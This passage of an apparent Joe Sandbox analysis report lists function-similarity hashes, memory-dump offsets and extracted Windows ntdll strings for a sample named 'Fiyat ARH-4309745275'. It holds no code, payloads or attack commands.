                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                  • Instruction ID: cb47b6bea5836d92cd138169382e358b2e45a6d759f6c868ad51d5d919085304
                  • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                  • Instruction Fuzzy Hash: CDD09235312A80CFD61A8B0CC6A8B1533E4BB84A44F854490E541CBB22D67CD940CA00
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                  • Instruction ID: fd703cdd6d83556b4976384b509ef6ed9d3589e686c238ee39d5d8bdbc8976c3
                  • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                  • Instruction Fuzzy Hash: 54C01232290648AFCB12AA99CE01F127BA9EBA8B40F000061F2058B670C631E820EA84
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                  • Instruction ID: 1432771e34d37eac95b12475d3fd18a34a7f70e30f3d239e2d49fb6371d98bae
                  • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                  • Instruction Fuzzy Hash: 8BD01236100248EFCB01DF81C990D9A772BFBD8710F109019FD19076118A31ED62DA50
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                  • Instruction ID: 3a2925f4d311b96ab664a079912401d3f82b67fe361e8e936c2add224b4b1149
                  • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                  • Instruction Fuzzy Hash: 6AC00179601A468BDF1ADA6ED298A4977E4FB44740F1548D0E8098BA22E624E809CA10
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e81e1a68cf9083aaee4f7ef5c9bd72929317ef9fecef040b34e755fb0b37df3c
                  • Instruction ID: 0da65784157cbd23c0b5f085bd2023cb405cf2e5c8287d7614febfc08ef4d8d9
                  • Opcode Fuzzy Hash: e81e1a68cf9083aaee4f7ef5c9bd72929317ef9fecef040b34e755fb0b37df3c
                  • Instruction Fuzzy Hash: FA900232605810129144715848855464045A7E1301B55C151E0464555CCF148A5A5361
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 34fce51086d66439592ef376f2919f36ccbe0a6df36148fc18d12efad1626d0d
                  • Instruction ID: 0f99b6051da02150b2a80f98fb261b2627b21ebb3ea2a51c5109046c2726b52c
                  • Opcode Fuzzy Hash: 34fce51086d66439592ef376f2919f36ccbe0a6df36148fc18d12efad1626d0d
                  • Instruction Fuzzy Hash: E9900262601510424144715848054066045A7E2301395C255E0594561CCB1889599369
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 00442492c695c6e1d766606e8201cc12034d5d948d2f2d188c93d98cb4b795e5
                  • Instruction ID: 058e8d2a118fb71b05dd7ccca8db146d71e1c1ad81b5232fbf4ec3e9b1b71648
                  • Opcode Fuzzy Hash: 00442492c695c6e1d766606e8201cc12034d5d948d2f2d188c93d98cb4b795e5
                  • Instruction Fuzzy Hash: CC90023260541802D15471584415746004597D1301F55C151E0064655DCB558B5977A1
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: daec4bc68f90d423f5bf1787a6b2e73d98cda7ede175d6f7a9f34aa2272b566d
                  • Instruction ID: 3be53962455b265e73fa547ec81a5d6a4a7c969a0498c2fbc199dd3b30a87af2
                  • Opcode Fuzzy Hash: daec4bc68f90d423f5bf1787a6b2e73d98cda7ede175d6f7a9f34aa2272b566d
                  • Instruction Fuzzy Hash: F790023220141802D10871584805686004597D1301F55C151E6064656EDB6589957231
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3a9b8eb188ed7f46fc939067cf605da4a097232310d9454cb93b1cd8c00fbc80
                  • Instruction ID: fc01e1917a6696d2272d78a4ab53427ed13b6c445f49fdb8120b33bb1636cdde
                  • Opcode Fuzzy Hash: 3a9b8eb188ed7f46fc939067cf605da4a097232310d9454cb93b1cd8c00fbc80
                  • Instruction Fuzzy Hash: 8790023220141802D1847158440564A004597D2301F95C155E0065655DCF158B5D77A1
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d03fa448ffbdcaf4153c2b2080834dc527722ded757cde5736aab899730756ba
                  • Instruction ID: 502feb083ca66d62e5af7f7f11f6866fd02c893d3faa154dc4109b3db3a81a09
                  • Opcode Fuzzy Hash: d03fa448ffbdcaf4153c2b2080834dc527722ded757cde5736aab899730756ba
                  • Instruction Fuzzy Hash: 9190023220545842D14471584405A46005597D1305F55C151E00A4695DDB258E59B761
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 21a7b0a1647ba2658ec4acf7512c8692ba44206d551b2031eb7a65a960b8f0bd
                  • Instruction ID: 5c7fce95fa1763603d8ff2342bb701e95aed6ef630d822ceabfb189b996622c3
                  • Opcode Fuzzy Hash: 21a7b0a1647ba2658ec4acf7512c8692ba44206d551b2031eb7a65a960b8f0bd
                  • Instruction Fuzzy Hash: 819002A2201550924504B2588405B0A454597E1201B55C156E1094561CCA2589559235
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f548416de2224a3d639ba99e3d3894518ddaad2fd21b7757832db2b5669b93b1
                  • Instruction ID: 680a88df53d9fab085f38cb6133cd13c7a1ae07fd82ce9cc33307810b79e6c0a
                  • Opcode Fuzzy Hash: f548416de2224a3d639ba99e3d3894518ddaad2fd21b7757832db2b5669b93b1
                  • Instruction Fuzzy Hash: 35900226221410020149B558060550B0485A7D7351395C155F1456591CCB2189695321
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 091afc2918c169f0c4cce5da0fa6d0e46c2629d2806d3826d3cb1a67c440f5a3
                  • Instruction ID: 3f74057a19013aabdb5afc92d311347434cfe10216b44f1ea1b50043aab36def
                  • Opcode Fuzzy Hash: 091afc2918c169f0c4cce5da0fa6d0e46c2629d2806d3826d3cb1a67c440f5a3
                  • Instruction Fuzzy Hash: D490043731141003010DF55C070550700C7D7D7351355C171F1055551CDF31CD755331
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8025b4653c1dab1966c0e8f004b1ac220f7aef6ede66955de6cc42bdd0d62ef0
                  • Instruction ID: 34159371996dc06f14da0863488314fa7fccc3fa03bf43240345e0fd4f7248ba
                  • Opcode Fuzzy Hash: 8025b4653c1dab1966c0e8f004b1ac220f7aef6ede66955de6cc42bdd0d62ef0
                  • Instruction Fuzzy Hash: 9690023224141402D145715844056060049A7D1241F95C152E0464555ECB558B5AAB61
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 60c82e62a59084b0cbff563ede84194de9f1711034af007a90dc700957de8b1c
                  • Instruction ID: 10904a96b7b65bfc0cae27335b27a33f2e18acc516957e18bd5d30b135f1f254
                  • Opcode Fuzzy Hash: 60c82e62a59084b0cbff563ede84194de9f1711034af007a90dc700957de8b1c
                  • Instruction Fuzzy Hash: F3900222242451525549B15844055074046A7E1241795C152E1454951CCA26995AD721
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f154c5afc818dbe1c2f6dabac418c59feebd5bcbdfb3b924d5c09978db09524f
                  • Instruction ID: 08c57d84b5a56bc8e14bb0388347d0f7dab3156fe30f5215fa1a46e36c524e98
                  • Opcode Fuzzy Hash: f154c5afc818dbe1c2f6dabac418c59feebd5bcbdfb3b924d5c09978db09524f
                  • Instruction Fuzzy Hash: C490022230141003D144715854196064045E7E2301F55D151E0454555CDE15895A5322
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 52185bd0b05eb9799d65ba2a751c56bd12764b7c0c3f706cb76eee312633f65a
                  • Instruction ID: 7bbe98b4c6fee789c6a626602dbbb64c9735dfb94d3c0823ee2dc7fe2ea9c56e
                  • Opcode Fuzzy Hash: 52185bd0b05eb9799d65ba2a751c56bd12764b7c0c3f706cb76eee312633f65a
                  • Instruction Fuzzy Hash: A690022A21341002D1847158540960A004597D2202F95D555E0055559CCE15896D5321
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 34386472b477bff707f84bf9a489716252b2a527d8ad6764c4b05081d0025650
                  • Instruction ID: 2f31593bc0ed9e7b9e4034e8fdd0b1f8f3cb553fe42b9a0c7ae4406c64d82321
                  • Opcode Fuzzy Hash: 34386472b477bff707f84bf9a489716252b2a527d8ad6764c4b05081d0025650
                  • Instruction Fuzzy Hash: 2C90022220545442D10475585409A06004597D1205F55D151E10A4596DCB358955A231
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 726a50d8c395d87af302aaf64911c6d51522dae72babdf603f3812c3e47c2d50
                  • Instruction ID: 15f1768ca0ceab91b1275c425c75a7bb979954c99a1248c294059e785a0dc863
                  • Opcode Fuzzy Hash: 726a50d8c395d87af302aaf64911c6d51522dae72babdf603f3812c3e47c2d50
                  • Instruction Fuzzy Hash: F190023220141402D10475985409646004597E1301F55D151E5064556ECB6589956231
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 33dc3f63557873db8056e9afe80436baf53f0ebefffd032fa58fc9a5cf48b4ed
                  • Instruction ID: 6ad2365ebad897a76f5a423f9a73174c0d6776e46122401c1c9a9dd1982419e7
                  • Opcode Fuzzy Hash: 33dc3f63557873db8056e9afe80436baf53f0ebefffd032fa58fc9a5cf48b4ed
                  • Instruction Fuzzy Hash: 7390043330141403D104715C550D7070045D7D1301F55D551F047455DDDF57CD557331
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 47d6c940ff08727a86e1e2bb3ff537e71d6e57864ea669414876ac52eceb709b
                  • Instruction ID: c065b5516a5e5ccc1eba42fe227984996eedb3bb7f9cc55dbddd2c9976c7c0ef
                  • Opcode Fuzzy Hash: 47d6c940ff08727a86e1e2bb3ff537e71d6e57864ea669414876ac52eceb709b
                  • Instruction Fuzzy Hash: FB90022260541402D14471585419706005597D1201F55D151E0064555DCB598B5967A1
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7675939caeb1678c4fc58f849888275b7ad256fdaf4a06cc9fcfc13755c39597
                  • Instruction ID: d18e54153e178f56d69269c5f446a17f736b2eb8e47db9ab7dfa518799e706cf
                  • Opcode Fuzzy Hash: 7675939caeb1678c4fc58f849888275b7ad256fdaf4a06cc9fcfc13755c39597
                  • Instruction Fuzzy Hash: CA90023220141842D10471584405B46004597E1301F55C156E0164655DCB15C9557621
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 910871ea3d7c24c3f34d78f226491a11ba0831a7047bc2c32a3ef036cb04e516
                  • Instruction ID: fbfb4846948e9d9d19cf496e217cf4cfae178585fcdf1fc3b7ad1c9447567688
                  • Opcode Fuzzy Hash: 910871ea3d7c24c3f34d78f226491a11ba0831a7047bc2c32a3ef036cb04e516
                  • Instruction Fuzzy Hash: 41900222601410424144716888459064045BBE2211755C261E09D8551DCA5989695765
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a699738b07a672d28eeee1a1075c53f3accae1b0e0aabc040ac416149ab4997c
                  • Instruction ID: 01d227cd971fa676b838e0c570206d36955420fa7f743f42109ab966ce2be7ba
                  • Opcode Fuzzy Hash: a699738b07a672d28eeee1a1075c53f3accae1b0e0aabc040ac416149ab4997c
                  • Instruction Fuzzy Hash: 1590023220181402D10471584809747004597D1302F55C151E51A4556ECB65C9956631
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e1abadca324ba49d8c23fe4cda4fa7d9a57a02c6be88dd8c44c0fb0c78d9ee6c
                  • Instruction ID: 38a3b2435a786dd13cff7b8439997d55170ba6acbe2cd8a983fa8fd8a2e29166
                  • Opcode Fuzzy Hash: e1abadca324ba49d8c23fe4cda4fa7d9a57a02c6be88dd8c44c0fb0c78d9ee6c
                  • Instruction Fuzzy Hash: 3990023220181402D1047158481570B004597D1302F55C151E11A4556DCB2589556671
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                  • API String ID: 48624451-2108815105
                  • Opcode ID: 79f1241fd22797a6b1f31f49d1e139128f38e18417c891784ec0d8d5d27f7e50
                  • Instruction ID: f760eb4bd8ee5fdef9db88287ed3828d86e4410bd0f1086f484359343f4a1113
                  • Opcode Fuzzy Hash: 79f1241fd22797a6b1f31f49d1e139128f38e18417c891784ec0d8d5d27f7e50
                  • Instruction Fuzzy Hash: BA51C4A5A00116BFDF19DBAC899097EFBB8FF082407A1C2E9E469D7645D334DE0087E0
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                  • API String ID: 48624451-2108815105
                  • Opcode ID: 3479639df6933308d1fcfba6a257de70e023eff3351b1848957cda032e554b3e
                  • Instruction ID: 00ae980661724e5579fd6c1178be3040100be2dfbe711acde2ef339c6c0dcf85
                  • Opcode Fuzzy Hash: 3479639df6933308d1fcfba6a257de70e023eff3351b1848957cda032e554b3e
                  • Instruction Fuzzy Hash: A451F3B5A40646AEDF28EE9CC8909BFBBF8EF44A00B4484D9E596D7641E774DA00C770
                  Strings
                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01B44742
                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01B446FC
                  • Execute=1, xrefs: 01B44713
                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01B44655
                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01B44725
                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 01B44787
                  • ExecuteOptions, xrefs: 01B446A0
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                  • API String ID: 0-484625025
                  • Opcode ID: a0f842f7183c34e1835a4d15f8b0a65b7ae645419bab4181d09be49e6eeaaa1f
                  • Instruction ID: 61135b6e33a3b9831c4457ef8000ac4b60a8a845187ff5d9ffa1ba5d50803332
                  • Opcode Fuzzy Hash: a0f842f7183c34e1835a4d15f8b0a65b7ae645419bab4181d09be49e6eeaaa1f
                  • Instruction Fuzzy Hash: 5A513B316002097BEF1AEBA8DC99FB9BBA8EF14340F1401D9E605A71C1DF71AA45CF50
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: __aulldvrm
                  • String ID: +$-$0$0
                  • API String ID: 1302938615-699404926
                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                  • Instruction ID: 2979a4fb6c34805813220b5a1dfba0ee1e24043f8d987c9894cc540b75c1f450
                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                  • Instruction Fuzzy Hash: 8D81E470E012498EEF2D8F6CC6507FEBBB1EF55720F9A46D9E861A7299C7308840C761
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: %%%u$[$]:%u
                  • API String ID: 48624451-2819853543
                  • Opcode ID: 1bd3fde08e8b8ecb3b1606bc7b5406e746496e8f229f7b93c5a00365090201ea
                  • Instruction ID: 1d194c5ee4fb0d4dae04082de66dddf2936fd97c0125929bf00b971a41ad10c1
                  • Opcode Fuzzy Hash: 1bd3fde08e8b8ecb3b1606bc7b5406e746496e8f229f7b93c5a00365090201ea
                  • Instruction Fuzzy Hash: BE21657AA00119ABDB14FF7ACC41AEE7BF8EF58A40F54019AE905E3204E730D915CBA1
                  Strings
                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01B402E7
                  • RTL: Re-Waiting, xrefs: 01B4031E
                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01B402BD
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                  • API String ID: 0-2474120054
                  • Opcode ID: bf43aceaf450da01de32de73d8f50a4063d4473b7d1e2d9f493d7b60859fb9f9
                  • Instruction ID: c1d4c0d06ba9093b68e908f6b9bd903323ae74e442151b3a8819526c4f1318aa
                  • Opcode Fuzzy Hash: bf43aceaf450da01de32de73d8f50a4063d4473b7d1e2d9f493d7b60859fb9f9
                  • Instruction Fuzzy Hash: B7E1AE326047419FDB29DF68C884B6ABBE0FB88714F144A9DF6A5CB2E1D774D844CB42
                  Strings
                  • RTL: Resource at %p, xrefs: 01B47B8E
                  • RTL: Re-Waiting, xrefs: 01B47BAC
                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01B47B7F
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID:
                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                  • API String ID: 0-871070163
                  • Opcode ID: 598d5c2168e89f3d5a365eb713854baf8474095b7fefc76a6c516669c170344d
                  • Instruction ID: f367057da14344c3a25b710b1cb7eb13ee027e9f1b47e55eda648ec8cea353e5
                  • Opcode Fuzzy Hash: 598d5c2168e89f3d5a365eb713854baf8474095b7fefc76a6c516669c170344d
                  • Instruction Fuzzy Hash: 0141F6353007029FDB2ADE29C950B66BBE5FF94710F100A9DF956D7680DB31E805CB91
                  APIs
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01B4728C
                  Strings
                  • RTL: Resource at %p, xrefs: 01B472A3
                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01B47294
                  • RTL: Re-Waiting, xrefs: 01B472C1
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                  • API String ID: 885266447-605551621
                  • Opcode ID: 494dd816899f623c4812babd9996a025dd9831fa5c8369a97e6d44ee1f05ec2d
                  • Instruction ID: b289c5b8339dd251be429be526855d4ff53bd398e441a65a1063f357f2ff1583
                  • Opcode Fuzzy Hash: 494dd816899f623c4812babd9996a025dd9831fa5c8369a97e6d44ee1f05ec2d
                  • Instruction Fuzzy Hash: 66413035700202ABCB29CE29CD41F6ABBA5FB95710F104698F955EB280DB31E842CBD1
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000007.00000002.1542899848.0000000001AA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01AA0000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_7_2_1aa0000_Fiyat ARH-4309745275.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: %%%u$]:%u
                  • API String ID: 48624451-3050659472
                  • Opcode ID: 2d38c8dc31ecbd571e9c76ba9f0e663b94685d9e5943ed3b6204b8f46a7a1a03
                  • Instruction ID: 0659c63de50cd2831123c2b37d00dc278d8531d00d235a63b80619d345deebd3
                  • Opcode Fuzzy Hash: 2d38c8dc31ecbd571e9c76ba9f0e663b94685d9e5943ed3b6204b8f46a7a1a03
